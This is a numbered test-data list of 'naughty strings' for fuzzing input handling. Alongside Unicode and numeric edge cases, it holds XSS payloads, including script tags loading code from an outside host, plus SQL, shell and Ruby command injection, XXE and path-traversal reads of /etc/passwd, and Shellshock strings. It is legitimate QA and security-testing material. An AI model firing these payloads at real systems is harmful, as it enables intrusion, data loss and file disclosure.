Naughty Strings

1. # Reserved Strings
2. # Strings which may be used elsewhere in code
3.  
4. undefined
5. undef
6. null
7. NULL
8. (null)
9. nil
10. NIL
11. true
12. false
13. True
14. False
15. None
16. hasOwnProperty
17. \
18. \\
19.  
20. # Numeric Strings
21. #
22. # Strings which can be interpreted as numeric
23.  
24. 0
25. 1
26. 1.00
27. $1.00
28. 1/2
29. 1E2
30. 1E02
31. 1E+02
32. 1e+99
33. -1
34. -1.00
35. -$1.00
36. -1/2
37. -1E2
38. -1E02
39. -1E+02
40. 1e-99
41. 1/0
42. 0/0
43. -2147483648/-1
44. -9223372036854775808/-1
45. 0.00
46. 0..0
47. .
48. 0.0.0
49. 0,00
50. 0,,0
51. ,
52. 0,0,0
53. 0.0/0
54. 1.0/0.0
55. 0.0/0.0
56. 1,0/0,0
57. 0,0/0,0
58. --1
59. -
60. -.
61. -,
62. 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
63. NaN
64. Infinity
65. -Infinity
66. INF
67. 1#INF
68. -1#IND
69. 1#QNAN
70. 1#SNAN
71. 1#IND
72. 0x0
73. 0xffffffff
74. 0xffffffffffffffff
75. 0xabad1dea
76. 123456789012345678901234567890123456789
77. 1,000.00
78. 1 000.00
79. 1'000.00
80. 1,000,000.00
81. 1 000 000.00
82. 1'000'000.00
83. 1.000,00
84. 1 000,00
85. 1'000,00
86. 1.000.000,00
87. 1 000 000,00
88. 1'000'000,00
89. 01000
90. 08
91. 09
92. 2.2250738585072011e-308
93.  
94. # Special Characters
95. #
96. # Strings which contain common special ASCII characters (may need to be escaped)
97.  
98. ,./;'[]\-=
99. <>?:"{}|_+
100. !@#$%^&*()`~
101.  
102. # Unicode Symbols
103. #
104. # Strings which contain common unicode symbols (e.g. smart quotes)
105.  
106. Ω≈ç√∫˜µ≤≥÷
107. åß∂ƒ©˙∆˚¬…æ
108. œ∑´®†¥¨ˆøπ“‘
109. ¡™£¢∞§¶•ªº–≠
110. ¸˛Ç◊ı˜Â¯˘¿
111. ÅÍÎÏ˝ÓÔÒÚÆ☃
112. Œ„´‰ˇÁ¨ˆØ∏”’
113. `⁄€‹›fifl‡°·‚—±
114. ⅛⅜⅝⅞
115. ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
116. ٠١٢٣٤٥٦٧٨٩
117.  
118. # Unicode Subscript/Superscript
119. #
120. # Strings which contain unicode subscripts/superscripts; can cause rendering issues
121.  
122. ⁰⁴⁵
123. ₀₁₂
124. ⁰⁴⁵₀₁₂
125.  
126. # Quotation Marks
127. #
128. # Strings which contain misplaced quotation marks; can cause encoding errors
129.  
130. '
131. "
132. ''
133. ""
134. '"'
135. "''''"'"
136. "'"'"''''"
137. <foo val=“bar” />
138. <foo val=“bar” />
139. <foo val=”bar“ />
140. <foo val=`bar' />
141.  
142. # Two-Byte Characters
143. #
144. # Strings which contain two-byte characters: can cause rendering issues or character-length issues
145.  
146. 田中さんにあげて下さい
147. パーティーへ行かないか
148. 和製漢語
149. 部落格
150. 사회과학원 어학연구소
151. 찦차를 타고 온 펲시맨과 쑛다리 똠방각하
152. 社會科學院語學研究所
153. 울란바토르
154. 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
155.  
156. # Japanese Emoticons
157. #
158. # Strings which consists of Japanese-style emoticons which are popular on the web
159.  
160. ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ
161. (｡◕ ∀ ◕｡)
162. ｀ｨ(´∀｀∩
163. __ﾛ(,_,*)
164. ・(￣∀￣)・:*:
165. ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ
166. ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
167. (╯°□°）╯︵ ┻━┻)
168. (ﾉಥ益ಥ）ﾉ ┻━┻
169. ( ͡° ͜ʖ ͡°)
170.  
171. # Emoji
172. #
173. # Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
174.  
175. 😍
176. 👩🏽
177. 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
178. 🐵 🙈 🙉 🙊
179. ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
180. ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
181. 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
182. 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
183.  
184. # Regional Indicator Symbols
185. #
186. # Regional Indicator Symbols can be displayed differently across
187. # fonts, and have a number of special behaviors
188.  
189. 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
190. 🇺🇸🇷🇺🇸🇦🇫🇦🇲
191. 🇺🇸🇷🇺🇸🇦
192.  
193. # Unicode Numbers
194. #
195. # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
196.  
197. １２３
198. ١٢٣
199.  
200. # Right-To-Left Strings
201. #
202. # Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
203.  
204. ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
205. בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
206. הָיְתָהtestالصفحات التّحول
207. ﷽
208. ﷺ
209. مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
210. # Unicode Spaces
211. #
212. # Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html)
213.  
214. ​
215.  
216. ᠎
217. 　
218. 
219. ␣
220. ␢
221. ␡
222.  
223. # Trick Unicode
224. #
225. # Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
226.  
227. ‪‪test‪
228. ‫test‫
229. 
test

230. test⁠test‫
231. ⁦test⁧
232.  
233. # Zalgo Text
234. #
235. # Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
236.  
237. Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
238. ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
239. ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
240. ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
241. Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
242.  
243. # Unicode Upsidedown
244. #
245. # Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com)
246.  
247. ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
248. 00˙Ɩ$-
249.  
250. # Unicode font
251. #
252. # Strings which contain bold/italic/etc. versions of normal characters
253.  
254. Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ
255. 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
256. 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
257. 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
258. 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
259. 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
260. 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
261. ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
262.  
263. # Script Injection
264. #
265. # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
266.  
267. <script>alert(123)</script>
268. &lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
269. <img src=x onerror=alert(123) />
270. <svg><script>123<1>alert(123)</script>
271. "><script>alert(123)</script>
272. '><script>alert(123)</script>
273. ><script>alert(123)</script>
274. </script><script>alert(123)</script>
275. < / script >< script >alert(123)< / script >
276. onfocus=JaVaSCript:alert(123) autofocus
277. " onfocus=JaVaSCript:alert(123) autofocus
278. ' onfocus=JaVaSCript:alert(123) autofocus
279. ＜script＞alert(123)＜/script＞
280. <sc<script>ript>alert(123)</sc</script>ript>
281. --><script>alert(123)</script>
282. ";alert(123);t="
283. ';alert(123);t='
284. JavaSCript:alert(123)
285. ;alert(123);
286. src=JaVaSCript:prompt(132)
287. "><script>alert(123);</script x="
288. '><script>alert(123);</script x='
289. ><script>alert(123);</script x=
290. " autofocus onkeyup="javascript:alert(123)
291. ' autofocus onkeyup='javascript:alert(123)
292. <script\x20type="text/javascript">javascript:alert(1);</script>
293. <script\x3Etype="text/javascript">javascript:alert(1);</script>
294. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
295. <script\x09type="text/javascript">javascript:alert(1);</script>
296. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
297. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
298. <script\x0Atype="text/javascript">javascript:alert(1);</script>
299. '`"><\x3Cscript>javascript:alert(1)</script>
300. '`"><\x00script>javascript:alert(1)</script>
301. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
302. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
303. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
304. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
305. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
306. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
307. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
308. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
309. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
310. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
311. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
312. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
313. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
314. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
315. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
316. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
317. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
318. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
319. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
320. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
321. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
322. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
323. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
324. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
325. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
326. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
327. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
328. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
329. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
330. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
331. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
332. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
333. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
334. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
335. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
336. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
337. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
338. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
339. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
340. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
341. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
342. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
343. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
344. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
345. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
346. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
347. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
348. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
349. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
350. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
351. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
352. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
353. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
354. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
355. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
356. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
357. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
358. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
359. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
360. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
361. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
362. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
363. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
364. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
365. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
366. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
367. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
368. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
369. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
370. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
371. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
372. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
373. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
374. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
375. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
376. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
377. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
378. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
379. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
380. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
381. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
382. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
383. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
384. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
385. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
386. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
387. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
388. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
389. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
390. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
391. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
392. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
393. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
394. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
395. "`'><script>\x3Bjavascript:alert(1)</script>
396. "`'><script>\x0Djavascript:alert(1)</script>
397. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
398. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
399. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
400. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
401. "`'><script>\x09javascript:alert(1)</script>
402. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
403. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
404. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
405. "`'><script>\x00javascript:alert(1)</script>
406. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
407. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
408. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
409. "`'><script>\x0Cjavascript:alert(1)</script>
410. "`'><script>\x2Bjavascript:alert(1)</script>
411. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
412. "`'><script>-javascript:alert(1)</script>
413. "`'><script>\x0Ajavascript:alert(1)</script>
414. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
415. "`'><script>\x7Ejavascript:alert(1)</script>
416. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
417. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
418. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
419. "`'><script>\xC2\x85javascript:alert(1)</script>
420. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
421. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
422. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
423. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
424. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
425. "`'><script>\x21javascript:alert(1)</script>
426. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
427. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
428. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
429. "`'><script>\x0Bjavascript:alert(1)</script>
430. "`'><script>\x20javascript:alert(1)</script>
431. "`'><script>\xC2\xA0javascript:alert(1)</script>
432. <img \x00src=x onerror="alert(1)">
433. <img \x47src=x onerror="javascript:alert(1)">
434. <img \x11src=x onerror="javascript:alert(1)">
435. <img \x12src=x onerror="javascript:alert(1)">
436. <img\x47src=x onerror="javascript:alert(1)">
437. <img\x10src=x onerror="javascript:alert(1)">
438. <img\x13src=x onerror="javascript:alert(1)">
439. <img\x32src=x onerror="javascript:alert(1)">
440. <img\x47src=x onerror="javascript:alert(1)">
441. <img\x11src=x onerror="javascript:alert(1)">
442. <img \x47src=x onerror="javascript:alert(1)">
443. <img \x34src=x onerror="javascript:alert(1)">
444. <img \x39src=x onerror="javascript:alert(1)">
445. <img \x00src=x onerror="javascript:alert(1)">
446. <img src\x09=x onerror="javascript:alert(1)">
447. <img src\x10=x onerror="javascript:alert(1)">
448. <img src\x13=x onerror="javascript:alert(1)">
449. <img src\x32=x onerror="javascript:alert(1)">
450. <img src\x12=x onerror="javascript:alert(1)">
451. <img src\x11=x onerror="javascript:alert(1)">
452. <img src\x00=x onerror="javascript:alert(1)">
453. <img src\x47=x onerror="javascript:alert(1)">
454. <img src=x\x09onerror="javascript:alert(1)">
455. <img src=x\x10onerror="javascript:alert(1)">
456. <img src=x\x11onerror="javascript:alert(1)">
457. <img src=x\x12onerror="javascript:alert(1)">
458. <img src=x\x13onerror="javascript:alert(1)">
459. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
460. <img src=x onerror=\x09"javascript:alert(1)">
461. <img src=x onerror=\x10"javascript:alert(1)">
462. <img src=x onerror=\x11"javascript:alert(1)">
463. <img src=x onerror=\x12"javascript:alert(1)">
464. <img src=x onerror=\x32"javascript:alert(1)">
465. <img src=x onerror=\x00"javascript:alert(1)">
466. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
467. <img src="x` `<script>javascript:alert(1)</script>"` `>
468. <img src onerror /" '"= alt=javascript:alert(1)//">
469. <title onpropertychange=javascript:alert(1)></title><title title=>
470. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
471. <!--[if]><script>javascript:alert(1)</script -->
472. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
473. <script src="/\%(jscript)s"></script>
474. <script src="\\%(jscript)s"></script>
475. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
476. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
477. <IMG SRC=# onmouseover="alert('xxs')">
478. <IMG SRC= onmouseover="alert('xxs')">
479. <IMG onmouseover="alert('xxs')">
480. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
481. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
482. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
483. <IMG SRC="jav ascript:alert('XSS');">
484. <IMG SRC="jav&#x09;ascript:alert('XSS');">
485. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
486. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
487. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
488. <IMG SRC=" &#14; javascript:alert('XSS');">
489. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
490. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
491. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
492. <<SCRIPT>alert("XSS");//<</SCRIPT>
493. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
494. <SCRIPT SRC=//ha.ckers.org/.j>
495. <IMG SRC="javascript:alert('XSS')"
496. <iframe src=http://ha.ckers.org/scriptlet.html <
497. \";alert('XSS');//
498. <u oncopy=alert()> Copy me</u>
499. <i onwheel=alert(1)> Scroll over me </i>
500. <plaintext>
501. http://a/%%30%30
502.  
503. # SQL Injection
504. #
505. # Strings which can cause a SQL injection if inputs are not sanitized
506.  
507. 1;DROP TABLE users
508. 1'; DROP TABLE users-- 1
509. ' OR 1=1 -- 1
510. ' OR '1'='1
511.  
512. %
513. _
514.  
515. # Server Code Injection
516. #
517. # Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
518.  
519. -
520. --
521. --version
522. --help
523. $USER
524. /dev/null; touch /tmp/blns.fail ; echo
525. `touch /tmp/blns.fail`
526. $(touch /tmp/blns.fail)
527. @{[system "touch /tmp/blns.fail"]}
528.  
529. # Command Injection (Ruby)
530. #
531. # Strings which can call system commands within Ruby/Rails applications
532.  
533. eval("puts 'hello world'")
534. System("ls -al /")
535. `ls -al /`
536. Kernel.exec("ls -al /")
537. Kernel.exit(1)
538. %x('ls -al /')
539.  
540. # XXE Injection (XML)
541. #
542. # String which can reveal system files when parsed by a badly configured XML parser
543.  
544. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
545.  
546. # Unwanted Interpolation
547. #
548. # Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
549.  
550. $HOME
551. $ENV{'HOME'}
552. %d
553. %s
554. {0}
555. %*.*s
556.  
557. # File Inclusion
558. #
559. # Strings which can cause user to pull in files that should not be a part of a web server
560.  
561. ../../../../../../../../../../../etc/passwd%00
562. ../../../../../../../../../../../etc/hosts
563.  
564. # Known CVEs and Vulnerabilities
565. #
566. # Strings that test for known vulnerabilities
567.  
568. () { 0; }; touch /tmp/blns.shellshock1.fail;
569. () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
570. <<< %s(un='%s') = %u
571.  
572. # MSDOS/Windows Special Filenames
573. #
574. # Strings which are reserved characters in MSDOS/Windows
575.  
576. CON
577. PRN
578. AUX
579. CLOCK$
580. NUL
581. A:
582. ZZ:
583. COM1
584. LPT1
585. LPT2
586. LPT3
587. COM2
588. COM3
589. COM4
590.  
591. # IRC specific strings
592. #
